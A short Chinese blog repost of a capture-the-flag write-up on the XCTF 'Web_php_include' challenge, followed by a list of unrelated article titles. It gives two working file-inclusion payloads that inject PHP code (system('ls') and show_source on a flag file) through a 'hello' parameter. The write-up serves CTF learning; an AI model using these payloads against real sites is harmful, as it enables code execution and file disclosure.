博客
关于我
XCTF web Web_php_include (php://过滤)
阅读量:321 次
发布时间:2019-03-04

本文共 276 字,大约阅读时间需要 1 分钟。

题目代码

用php://来引入文件流,然后include显示文件信息

php://被过滤,但是有个hello

因为这个页面就是默认页面,而且默认页面也可以用index.php来访问

可以把page转到当前页面,并且配合hello来执行一条php函数的语句获取信息就可以了。

?page=http://127.0.0.1/index.php/?hello=<?system("ls");?>

?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>

转载地址:http://wknh.baihongyu.com/

你可能感兴趣的文章
oracle创建序列语法
查看>>
springboot通过控制层跳转页面404
查看>>
idea2020 没有 tomcat server
查看>>
为什么讨厌所谓仿生AI的说法
查看>>
Fatal NI connect error 12547, connecting to: (LOCAL=NO)
查看>>
ORACLE 客户端工具
查看>>
云服务器springboot jar项目开启jmx remote监控-解决无法连接的问题
查看>>
快速排序
查看>>
Pyinstaller打包的exe文件过大的解决方法
查看>>
Linux的软链接跟Windows快捷方式一样?
查看>>
更改github的默认语言类型
查看>>
使用bigdecima实例化时传int和string时的精度丢失
查看>>
使用第三方sdk,微信wechat扫码登录
查看>>
windows下的netstat命令略解和linux下的netstat命令/awk打印或分割字符串
查看>>
mysql中的行转列
查看>>
C - 食物链 并查集
查看>>
ValueError: check_hostname requires server_hostname
查看>>
基于LabVIEW的入门指南
查看>>
PCB布局系列汇总
查看>>
电容入门知识
查看>>